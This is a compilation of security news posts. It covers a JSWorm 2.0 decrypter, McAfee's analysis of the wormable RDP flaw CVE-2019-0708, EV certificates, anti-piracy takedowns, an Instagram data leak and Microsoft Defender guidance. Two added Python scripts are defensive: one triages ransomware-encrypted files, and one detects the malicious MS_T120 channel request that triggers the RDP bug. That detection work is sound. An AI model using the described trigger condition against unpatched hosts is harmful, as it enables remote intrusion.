Aqua Security validates its Cloud Native Security Platform for VMware Enterprise PKS

Aqua Security, the leading platform provider for securing container-based and cloud native applications, announced that Aqua Cloud Native Security Platform (CSP) has attained VMware Partner Ready status for PKS. The validation confirms that the solution has been tested and verified to interoperate with VMware Enterprise PKS, and can fully manage and secure workloads running on VMware Enterprise PKS. “We are pleased that Aqua Security has validated its Cloud Native Security Platform for … More

The post Aqua Security validates its Cloud Native Security Platform for VMware Enterprise PKS appeared first on Help Net Security.

riskmethods and RapidRatings partnership to enhance customers’ risk management practices

riskmethods, a leader in supply chain risk management, has partnered with RapidRatings to allow their customers to incorporate financial health data of public and private partners into their supply chain risk management workflows. With the riskmethods and RapidRatings combined solution, companies can streamline traditional data entry and data extraction processes and automatically integrate their financial data sources, including financial risk indicators derived by RapidRatings, into the riskmethods scorecard. Customers can now receive the best financial … More

The post riskmethods and RapidRatings partnership to enhance customers’ risk management practices appeared first on Help Net Security.

Radiant Logic unveils RadiantOne with FIPS 140-2 validated encryption

Radiant Logic, the leading provider of the federated identity and directory service, announced the immediate availability of RadiantOne with FIPS 140-2 validated encryption. Radiant Logic recently achieved the FIPS 140-2 validation after an independently accredited lab put the Radiant Logic Cryptographic Module for Java through a series of tests. After proving conformance with the FIPS 140-2 standard, the module’s test report was sent to CMVP, the Cryptographic Module Validation Program, operated by the United States … More

The post Radiant Logic unveils RadiantOne with FIPS 140-2 validated encryption appeared first on Help Net Security.

GlobalSign Digital Signing Service now supports 2014/55/EU directive

GMO GlobalSign, a global Certificate Authority (CA) and leading provider of identity and security solutions for the Internet of Things (IoT), announced that its popular Digital Signing Service (DSS) supports 2014/55/EU, the newly implemented European Union directive regarding electronic invoicing. The directive defines a common standard for e-invoices to reduce the complexity and legal uncertainty around e-invoicing and make cross-border trade relations easier. As a result of the new regulation, which came into force on … More

The post GlobalSign Digital Signing Service now supports 2014/55/EU directive appeared first on Help Net Security.

Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform

Spirent Communications, the trusted provider of test, measurement, assurance, and analytics solutions for next-generation devices and networks, announced that it has fully incorporated the NetSecOPEN test suite into its CyberFlood testing platform. The new built-in capabilities provide CyberFlood users with the ability to easily perform assessments of their security systems using the full breadth of NetSecOPEN’s open network security test standard methodologies. NetSecOPEN is a vendor-independent standards body that brings together leading testing solutions vendors, … More

The post Spirent incorporates NetSecOPEN test suite into its CyberFlood testing platform appeared first on Help Net Security.

Pliant raises over $2.5 million to launch the RPA company

Pliant, a workflow automation platform for API-driven enterprise and service provider infrastructures, announced it has launched out of stealth and secured over $2.5 million in funding, led by former SevOne tech startup exec, Vess Bakalov. Backed by Newfund Capital, New Stack Ventures, Leading Edge, and other angel and family investors, the funding will be used to launch the RPA company. “In today’s on-demand and fast-paced economy, Pliant lets you build sophisticated workflows to automate complex … More

The post Pliant raises over $2.5 million to launch the RPA company appeared first on Help Net Security.

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware: thanks to experts at Emsisoft they can decrypt their files for free.

Experts at Emsisoft’s malware research team released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and implements Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable callouts in two different malware samples naming ID Ransomware and several prominent malware researchers:




Experts pointed out that there have been multiple confirmed submissions to the online service ID Ransomware that allows victims to upload their encrypted files to identify the ransomware that infected their machines. Since January 2019, experts observed encrypted files uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.
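As an added example (not Emsisoft's tooling and not code from the original article), the following Python script turns that naming convention into a quick triage check over a file listing: it distinguishes the version 2 pattern quoted above from the bare ".JSWORM" extension of the first C# variant, extracts the victim ID and contact e-mail embedded in each name, and collects the ransom note paths, which the Emsisoft decrypter asks for as its input. The sample listing is constructed for illustration and the e-mail address in it is a placeholder.

```python
import re
from typing import Dict, List, Optional

# JSWorm 2.0 naming as quoted by Emsisoft: <name>.[ID-<numbers>][<email>].JSWORM
JSWORM_V2_RE = re.compile(
    r"^(?P<original>.+)\.\[ID-(?P<victim_id>\d+)\]\[(?P<email>[^\]\s]+@[^\]\s]+)\]\.JSWORM$",
    re.IGNORECASE,
)
# The earlier C# variant only appended ".JSWORM" (no ID / e-mail brackets).
JSWORM_V1_RE = re.compile(r"^(?P<original>.+)\.JSWORM$", re.IGNORECASE)
RANSOM_NOTE_NAME = "jsworm-decrypt.txt"


def classify_path(path: str) -> Optional[Dict[str, str]]:
    """Classify one path. Returns None for files that carry no JSWorm marker."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    if name.lower() == RANSOM_NOTE_NAME:
        return {"kind": "ransom_note", "path": path}
    m = JSWORM_V2_RE.match(name)
    if m:  # test the v2 pattern first: v2 names also end in .JSWORM
        return {
            "kind": "encrypted_v2",
            "path": path,
            "original": m.group("original"),
            "victim_id": m.group("victim_id"),
            "email": m.group("email"),
        }
    m = JSWORM_V1_RE.match(name)
    if m:
        return {"kind": "encrypted_v1", "path": path, "original": m.group("original")}
    return None


def triage(paths: List[str]) -> Dict[str, object]:
    """Summarise a listing: which variant hit, how many files, IDs/e-mails seen, note paths."""
    summary: Dict[str, object] = {
        "encrypted_v2": 0, "encrypted_v1": 0, "ransom_notes": 0, "untouched": 0,
        "victim_ids": set(), "emails": set(), "note_paths": [],
    }
    for p in paths:
        hit = classify_path(p)
        if hit is None:
            summary["untouched"] += 1
        elif hit["kind"] == "ransom_note":
            summary["ransom_notes"] += 1
            summary["note_paths"].append(p)
        elif hit["kind"] == "encrypted_v2":
            summary["encrypted_v2"] += 1
            summary["victim_ids"].add(hit["victim_id"])
            summary["emails"].add(hit["email"])
        else:
            summary["encrypted_v1"] += 1
    return summary


# Constructed sample listing (not real victim data; the e-mail is a placeholder).
SAMPLE_LISTING = [
    r"C:\Users\bob\Documents\report.docx.[ID-1234567][decrypt.help@example.com].JSWORM",
    r"C:\Users\bob\Pictures\holiday.jpg.[ID-1234567][decrypt.help@example.com].JSWORM",
    r"C:\Users\bob\Documents\JSWORM-DECRYPT.txt",
    r"C:\Users\bob\Documents\notes.txt",
    r"D:\share\backup.zip.JSWORM",
]

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Feed `triage()` the output of a directory walk over the affected shares; if `encrypted_v2` is non-zero and `note_paths` is non-empty, the host matches the variant Emsisoft's decrypter handles, and any path in `note_paths` is the file to point the decrypter at in step 3 below.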

Once it has infected a computer, the JSWorm 2.0 ransomware performs the following actions:

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when run as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.

Victims of JSWorm 2.0 can follow the steps below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.
JSWorm decrypter


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0. ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP, which has not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

According to the advisory, the issue was serious enough to allow remote code execution and was wormable, meaning it could spread automatically between unprotected systems without user interaction. The bulletin referenced the well-known network worm “WannaCry”, which spread widely just a couple of months after Microsoft released MS17-010 in March 2017 as the patch for the vulnerability it exploited. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario, and we urge those with unpatched, affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely that malicious actors have weaponized this bug, and exploitation attempts will likely be observed in the wild in the very near future.

Vulnerable Operating Systems:

  • Windows 2003
  • Windows XP
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

The Remote Desktop Protocol (RDP) enables connection between a client and endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1, but due to limitations on the number of channels further defined Dynamic Virtual Channels (DVCs), which are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs which are created and torn down on demand.

It is this SVC binding that the CVE-2019-0708 patch fixes, in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions of the RDP kernel driver termdd.sys. As can be seen in figure 1, in the RDP connection sequence the connection is initiated and the channels are set up before the Security Commencement phase, that is, before any authentication takes place. That is what makes CVE-2019-0708 wormable: an exploit can reach the bug on any host with port 3389 open and self-propagate across the network without credentials.


Figure 1: RDP Protocol Sequence

The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

Figure 2: Standard GCC Conference Initialization Sequence

However, during GCC Conference Initialization the client supplies the channel names, and the server did not validate them against an allow list, meaning an attacker can request another SVC named “MS_T120” that gets bound to a channel index other than 31. It is the use of MS_T120 on a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel
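To make that detection rule concrete, here is an added Python example (not McAfee's code and not part of the original post) that decodes the TS_UD_CS_NET block of a client's GCC Conference Create Request as specified in MS-RDPBCGR 2.2.1.3.4: a channelCount followed by CHANNEL_DEF entries of an 8-byte null-padded name and a 4-byte options field. It lists the static virtual channel names the client asked for and flags any entry named MS_T120, since no legitimate client requests that name. The sample userData is constructed by the block's own helper rather than taken from a capture, and `scan_for_cs_net` locates the block inside raw connect bytes by header self-consistency instead of decoding the BER/PER wrapping, which is a shortcut of this example, not a parser the article describes. Treating an entry's position in the channelDefArray as the index the server would bind it to is likewise the example's assumption.

```python
import struct
from typing import Iterator, List, Tuple

# TS_UD_HEADER block types in the client's GCC Conference Create Request userData
# (MS-RDPBCGR 2.2.1.3.1). Only CS_NET carries the requested static virtual channels.
CS_CORE, CS_SECURITY, CS_NET, CS_CLUSTER = 0xC001, 0xC002, 0xC003, 0xC004
CHANNEL_DEF_SIZE = 12          # name[8] + options UINT32
RESERVED_CHANNEL = "MS_T120"   # internal channel name; no legitimate client requests it
RESERVED_INDEX = 31            # static channel index (0x1F) that termdd.sys binds MS_T120 to


def iter_user_data_blocks(user_data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the TS_UD blocks: each starts with type (LE16) and total length (LE16)."""
    off = 0
    while off + 4 <= len(user_data):
        block_type, length = struct.unpack_from("<HH", user_data, off)
        if length < 4 or off + length > len(user_data):
            raise ValueError(f"malformed TS_UD header at offset {off}")
        yield block_type, user_data[off + 4 : off + length]
        off += length


def parse_cs_net(body: bytes) -> List[Tuple[str, int]]:
    """Decode a TS_UD_CS_NET body: channelCount (LE32) then CHANNEL_DEF entries."""
    (count,) = struct.unpack_from("<I", body, 0)
    if len(body) < 4 + CHANNEL_DEF_SIZE * count:
        raise ValueError("channelCount exceeds CS_NET block length")
    channels = []
    for i in range(count):
        raw_name, options = struct.unpack_from("<8sI", body, 4 + CHANNEL_DEF_SIZE * i)
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", errors="replace")
        channels.append((name, options))
    return channels


def requested_channels(user_data: bytes) -> List[str]:
    """Names of the static virtual channels the client asked for, in array order."""
    names: List[str] = []
    for block_type, body in iter_user_data_blocks(user_data):
        if block_type == CS_NET:
            names.extend(name for name, _ in parse_cs_net(body))
    return names


def suspicious_channel_requests(user_data: bytes) -> List[str]:
    """Flag any client-supplied MS_T120 entry, the trigger condition for CVE-2019-0708."""
    findings = []
    for position, name in enumerate(requested_channels(user_data)):
        if name.upper() == RESERVED_CHANNEL:
            findings.append(
                f"client requested {RESERVED_CHANNEL} as channelDefArray entry {position}; "
                f"the server reserves this name for static channel {RESERVED_INDEX}"
            )
    return findings


def scan_for_cs_net(pdu: bytes) -> List[str]:
    """Find the CS_NET block inside raw MCS Connect Initial bytes without decoding
    the BER/PER wrapping. The header is self-consistent (length == 8 + 12 * channelCount),
    which keeps false hits on real traffic unlikely. Returns the channel names found."""
    for off in range(0, len(pdu) - 8 + 1):
        block_type, length, count = struct.unpack_from("<HHI", pdu, off)
        if (block_type == CS_NET and length == 8 + CHANNEL_DEF_SIZE * count
                and off + length <= len(pdu)):
            return [name for name, _ in parse_cs_net(pdu[off + 4 : off + length])]
    return []


def build_user_data(channel_names: List[str]) -> bytes:
    """Constructed sample userData (CS_SECURITY + CS_NET) for testing, not a capture."""
    # encryptionMethods = 0x1B (40/56/128-bit + FIPS), extEncryptionMethods = 0
    security = struct.pack("<HHII", CS_SECURITY, 12, 0x1B, 0)
    defs = b"".join(
        struct.pack("<8sI", n.encode("ascii"), 0x80800000)  # INITIALIZED | COMPRESS_RDP
        for n in channel_names
    )
    net = struct.pack("<HHI", CS_NET, 8 + CHANNEL_DEF_SIZE * len(channel_names),
                      len(channel_names))
    return security + net + defs


if __name__ == "__main__":
    normal = build_user_data(["rdpdr", "cliprdr", "rdpsnd"])
    abnormal = build_user_data(["rdpdr", "cliprdr", "MS_T120", "rdpsnd"])
    print("normal  :", requested_channels(normal), suspicious_channel_requests(normal))
    print("abnormal:", requested_channels(abnormal), suspicious_channel_requests(abnormal))
```

In practice the input is the MCS Connect Initial payload carved from the client side of an RDP session; `scan_for_cs_net` lets you run the check on that raw payload, and the finding it produces corresponds to the abnormal request in figure 3 (MS_T120 at a position other than the one reserved for it).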

The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

Figure 4: Windows Kernel and User Components

The Microsoft patch as shown in figure 5 now adds a check for a client connection request using channel name “MS_T120” and ensures it binds to channel 31 only (1Fh) in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

Figure 5: Microsoft Patch Adding Channel Binding Check

After we investigated the patch being applied for both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability and remotely execute code on a victim’s machine to launch the calculator application, a well-known litmus test for remote code execution.

Figure 6: Screenshot of our PoC executing

For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit works and that it is possible to execute code remotely on a vulnerable system without authentication. Network Level Authentication (NLA) should stop this exploit if enabled, because it requires the client to authenticate before the channel setup in which the bug is triggered; however, an attacker who already holds valid credentials can pass NLA and still reach the vulnerable code.

As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.


  • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
  • Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.
  • Client requests that name “MS_T120” on any channel other than 31 during the GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence of a legitimate use case.


It is also important to note that the RDP default port can be changed in the registry (the PortNumber value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp); after a reboot the service listens on the newly specified port. From a detection standpoint this is highly relevant.

Figure 7: RDP default port can be modified in the registry

Malware, or administrators inside a corporation, can change this with admin rights (or with a program that bypasses UAC) by writing the new port to the registry; if the system is not patched, the vulnerability remains exploitable over that non-standard port, so detection that keys only on port 3389 will miss it.

McAfee Customers:

Please stay tuned for product bulletins and security updates shortly!

If you have any questions, please contact McAfee Technical Support.


The post RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708 appeared first on McAfee Blogs.

PayPal’s Beautiful Demonstration of Extended Validation FUD


Sometimes the discussion around extended validation certificates (EV) feels a little like flogging a dead horse. In fact, it was only September that I proposed EV certificates are already dead for all sorts of good reasons that have only been reinforced since that time. Yet somehow, the discussion does seem to come up time and again as it did following this recent tweet of mine:

Frankly, I think this is more a symptom of people coming to grips with the true meaning of SSL (or TLS) than it is anything changing with the way certs are actually issued, but I digress. The ensuing discussion after that tweet reminded me that I really must check back in on what I suspect may be the single most significant example of why EV has become little more than a useless gimmick today. It all started on stage at NDC Sydney in September, more than 8 months ago now. Here's the exact moment deep-linked in the recorded video:

Well that was unexpected. I came off stage afterwards and sat down with Scott Helme to delve into it further, whereupon we found behaviour that you can still see today at the time of writing. Here's PayPal in Firefox:


You can clearly see the green EV indicator next to the address bar in Firefox, but load it up in Chrome and, well...


Now, you may have spotted in the video that the cert was issued by "DigiCert SHA2 Extended Validation Server CA", which would imply EV. It's also the same cert being served to both Firefox and Chrome; here's a look at it in both browsers (note that the serial number and validity periods match up):


The reason we're seeing the EV indicator in Firefox and not in Chrome has to do with the way the certificates chain in the respective browsers and again, here's Firefox then Chrome:


Whilst "DigiCert SHA2 Extended Validation Server CA" is the same in each browser, the upstream chain is then different with Firefox and Chrome both seeing different "DigiCert High Assurance EV Root CA" certs (even though they're named the same) and Chrome obviously then chaining up another couple of hops from there. But frankly, the technical explanation really isn't the point here, the point is that we're now nearly 8 months in which can only mean this:

PayPal really doesn't care that the world's most popular browser no longer displays the EV visual indicator.

And that's all EV ever really had going for it! (Note: yes, I know there can be regulatory requirements for EV in some jurisdictions, but let's not confuse that with it actually doing anything useful.) The entire value proposition put forward by the commercial CAs selling EV is that people will look for the indicator and trust the site so... it's pretty obvious that's not happening with PayPal.

Furthermore, as I've said many times before, for EV to work people have to change their behaviour when they don't see it! If someone stands up a PayPal phishing site, for example, EV is relying on people to say "ah, I was going to enter my PayPal credentials but I don't see EV therefore I won't". That's how EV "stops phishing" (according to those selling the certs), yet here we are with a site that used to have EV and if it ever worked then it was only by people knowing that PayPal should have it. So what does it signal now that it's no longer there? Clearly, that people aren't turning away due to its absence.

And finally, do you reckon PayPal is the sort of organisation that has the resources to go out and get another EV cert that would restore the visual indicator if need be? Of course they are! Have they? No, because it would be pointless anyway because nobody actually changes their behaviour in its absence!

It's a dead duck, let's move on.

Data Security in the Cloud: How to Lock Down the Next-Gen Perimeter

Enjoy the video replay of the recent Threatpost cloud security webinar, featuring a panel of experts offering best practices and ideas for managing data in a cloudified world.

Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones

Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media

As the Game of Thrones saga came to a close (no spoilers here), Group-IB has summed up the results of its anti-piracy campaign during Season 8 of Game of Thrones, one of the biggest franchises in TV history. Since April 2019, when the final season premiered, Group-IB’s Anti-Piracy team has successfully blocked more than 43,000 links to pirated copies of GOT Season 8 on pirate websites, forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect Game of Thrones against online pirates back in 2015. Since that time, the company’s specialists have blocked more than 180,000 links to illegal copies of Game of Thrones in Russian.

The final GOT Season 8 premiered on 14 April and became one of the show’s most popular seasons not only among fans all over the world, but also among online pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate websites, forums, and social media. Pirated copies of the GOT Season 8 episodes were spotted on 1,098 different websites, 94 of which were designed exclusively for the distribution of pirated GOT copies.

More than 30,000 unique links to pirated GOT episodes have been removed from the search results of the Russian search engine Yandex. In response to the blocking, online pirates struck back by creating mirrors on a daily basis – copies of their websites with new but very similar domain names. For instance, one of the pirates created more than 20 mirrors on their subdomains. However, according to the pirates’ forum posts, the owners of pirate websites were not ready for the “attack” on them: “Looks like somebody just wiped the links out. Some of the pages disappeared… some of them do not appear in search results”. It is also interesting that some of the groups on, a Russian social network, removed pirated episodes after receiving complaints and turned into GOT fan pages.

The streaming service Amediateka holds exclusive distribution rights for the Game of Thrones in Russia and since April 2015, when Season 5 premiered, has used the services of Group-IB to fight online pirates distributing illegal copies of the GOT in Russian. Season after season, online pirates’ interest in the show has only been increasing. For example, while Season 5 was broadcast, Group-IB’s Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7 saw an increase, reaching 12,540 links to pirated episodes detected and blocked. Season 8 set a record of 43,711 links. For the past 4 years, Group-IB detected and blocked more than 180,000 links, including links detected and blocked between the seasons’ airings.

Game of Thrones Season 8

GOT is not the only Amediateka’s show that Group-IB’s Anti-Piracy team protects, but it turned out to be pirates’ favorite one. Pirates’ other top targets include True Detective, with 23,473 pirated links detected and blocked, Billions (20,303 links), The Good Wife (14,541 links), and Westworld, with  12,229 links detected and blocked by Group-IB Anti-Piracy team.

“For us the battle against online pirates, trying to profit off the illegal distribution of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s characters,” commented Andrey Busargin, Director of Anti-Piracy and Brand Protection at Group-IB. “I would also like to highlight Amediateka’s commitment to counter online piracy in Russia: they brought in Group-IB Anti-Piracy team ahead of time and have been making continuous efforts to popularize legal viewership of the Game of Thrones making it available on its website, in movie theaters all over the country and even on the stadium.”

Group-IB‘s fight against digital piracy started in 2011, when the Anti-Piracy Department was established. Group-IB’s Anti-Piracy team uses unique machine-learning technologies applied in complex investigations of cyberattacks to detect pirate websites, find their owners and block illegal content. Group-IB’s Anti-Piracy system monitors 100,000+ resources in all languages ranging from torrent trackers and streaming services to social media groups and pirate platforms in the DarkNet. The average time to detect the first pirated copy on the Internet is 30 minutes. 80% of pirated links are successfully blocked by Group-IB team within 24 hours of their appearance on the Internet.


About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

Pierluigi Paganini

(SecurityAffairs – piracy, Game of Thrones)

The post Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones appeared first on Security Affairs.

ITIL Service Operation Processes: A Brief Introduction

ITIL Service Operation (SO), one of the five core publications that make up the ITIL (Information Technology Infrastructure Library) Service Management Lifecycle, provides guidance on maintaining stability in IT services and on managing services in supported environments.

The ITIL SO module takes care of some very important responsibilities including the monitoring of services, the resolving of incidents, the fulfilling of requests and the execution of operational tasks. Once the formal handover from the Service Transition process module is done, the SO module takes control of new/changed services and takes care of the execution of all design and transition plans. The SO module also measures all these plans for actual efficiency.

The Objectives

The ITIL SO module, which is totally customer facing, ensures that IT services are delivered efficiently and effectively and also that quality of service is maintained. Hence, key functionalities like fixing problems and service failures, fulfilling of user requests, executing routine operation tasks etc come under the purview of the SO module. The SO module also takes care of some other important aspects including reducing incidents and problems, minimizing impact of service outages on businesses, ensuring authorized access only to agreed IT services, assisting organizations in delivering benefits within SLA in the best of manners, supporting users in service-related matters etc.

The Processes

There are five processes under ITIL SO: Event Management, Incident Management, Request Fulfilment, Problem Management and Access Management.

Event Management ensures constant monitoring of CIs and services. Incident Management, as the term suggests, ensures that IT services are restored to a working state quickly after unexpected incidents. Request Fulfilment covers the acknowledgement and processing of service requests from users. Problem Management finds the root cause of problems and seeks to mitigate their impact or prevent them from recurring. Access Management ensures that access to services and functions is granted only to authorized users, in accordance with pre-defined policies.

These five processes are assigned to two major functional groups, the Service Desk and the Technical Support Group (Technical, Application and IT Operations Management), which we discuss in detail in the next section.

The Functions

ITIL SO comprises four functions and two sub-functions. The functions are: Service Desk, Technical Management, IT Operations Management and Applications Management.

Service Desk, which is the first and single point of contact, takes care of things like coordinating between end user and service provider, managing logged tickets, ensuring timely closure of user requests etc.

Technical Management is all about managing the IT infrastructure by providing technical expertise and support.

The IT Operations management deals with IT related day-to-day operational activities and comprises two sub-functions, namely IT Operations Control (monitoring and controlling of IT services and the underlying infrastructure) and Facilities Management (management of the physical environment where the IT infrastructure is located).

Application Management, as the term suggests, is all about managing applications throughout their lifecycle.

The Benefits

There are many benefits of the ITIL Service Operations process.

The main benefit, however, is that it helps reduce unplanned expenditure for organizations through optimized handling of service outages and proper identification of their causes. By ensuring that the duration and frequency of service outages are minimized, ITIL SO helps organizations make full use of services.

ITIL SO processes support an organization’s security policy by ensuring proper access management, and they also produce operational data for use by other ITIL processes. Providing quick, effective access to standard IT services is another benefit. ITIL SO also provides a framework for automating repetitive operations, which increases efficiency and makes better use of staff.

The post ITIL Service Operation Processes: A Brief Introduction appeared first on .

Data Leak Exposes Instagram Influencers

A leaked database has compromised the personal information of more than 49 million Instagram users, including celebrities and “influencers.”

The information was found on an unsecured database hosted on an Amazon cloud server and includes public-facing information from Instagram accounts as well as personal details, including email addresses and phone numbers. Techcrunch, the website that initially broke the story, traced the database back to Chtrbox, a social media marketing firm based in Mumbai.

The database appears to have been initially compiled to determine relative costs and overall influence of each Instagram account.

The chief executive of Chtrbox declined to comment on the story.

See the initial Techcrunch news article here.


The post Data Leak Exposes Instagram Influencers appeared first on Adam Levin.

DHS Issues Alert on Chinese-Made Drones

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according to an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, whose primary manufacturer is DJI, based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Step 9. Protect your OS: top 10 actions to secure your environment

In “Step 9. Protect your OS” of the Top 10 actions to secure your environment blog series, we provide resources to help you configure Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) to defend your Windows, macOS, Linux, iOS, and Android devices from advanced threats.

In an advanced threat, hackers and cybercriminals infiltrate your network through compromised users or vulnerable endpoints and can stay undetected for weeks—or even months—while they attempt to exfiltrate data and move laterally to gain more privileges. Microsoft Defender ATP helps you detect these threats early and take action immediately.

Enabling Microsoft Defender ATP and related products will help you:

  • Mitigate vulnerabilities.
  • Reduce your attack surface.
  • Enable next generation protection from the most advanced attacks.
  • Detect endpoint attacks in real-time and respond immediately.
  • Automate investigation and remediation.

Threat & Vulnerability Management

Threat & Vulnerability Management is a new component of Microsoft Defender ATP that provides:

  • Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities.
  • Linked machine vulnerability and security configuration assessment data in the context of exposure discovery.
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager.

To use Threat & Vulnerability Management, you’ll need to turn on the Microsoft Defender ATP preview features.

Attack surface reduction

Attack surface reduction limits the number of attack vectors that a malicious actor can use to gain entry. You can configure attack surface reduction through the following:

  • Microsoft Intune
  • System Center Configuration Manager
  • Group Policy
  • PowerShell cmdlets

Enable these capabilities to reduce your attack surface:

  • Hardware-based isolation: Configure Microsoft Defender Application Guard to protect your company while your employees browse the internet. You define which websites, cloud resources, and internal networks are trusted. Everything not on your list is considered untrusted.
  • Application control: Restrict the applications that your users can run and require that applications earn trust in order to run.
  • Device control: Configure Windows 10 hardware and software to “lock down” Windows systems so they operate with properties of mobile devices. Use configurable code integrity to restrict devices to running only authorized apps.
  • Exploit protection: Configure Microsoft Defender Exploit Guard to manage and reduce the attack surface of apps used by your employees.
  • Network protection: Use network protection to prevent employees from using an application to access dangerous domains that may host phishing scams, exploits, and other malicious content.
  • Controlled folder access: Prevent apps that Microsoft Defender Antivirus determines are malicious or suspicious from making changes to files in protected folders.
  • Network firewall: Block unauthorized network traffic from flowing into or out of the local device.
  • Attack surface reduction controls: Prevent actions and apps that are typically used by exploit-seeking malware to infect machines.

Next generation protection

The Intelligent Security Graph powers the antivirus capabilities of Microsoft Defender Antivirus, which works with Microsoft Defender ATP to protect desktops, laptops, and servers from the most advanced ransomware, fileless malware, and other types of attacks.

Configure Microsoft Defender Antivirus capabilities to:

  • Enable cloud-delivered protection: Leverage artificial intelligence (AI) and machine learning algorithms to analyze the billions of signals on the Intelligent Security Graph and identify and block attacks within seconds.
  • Specify the cloud-delivered protection level: Define the amount of information to be shared with the cloud and how aggressively new files are blocked.
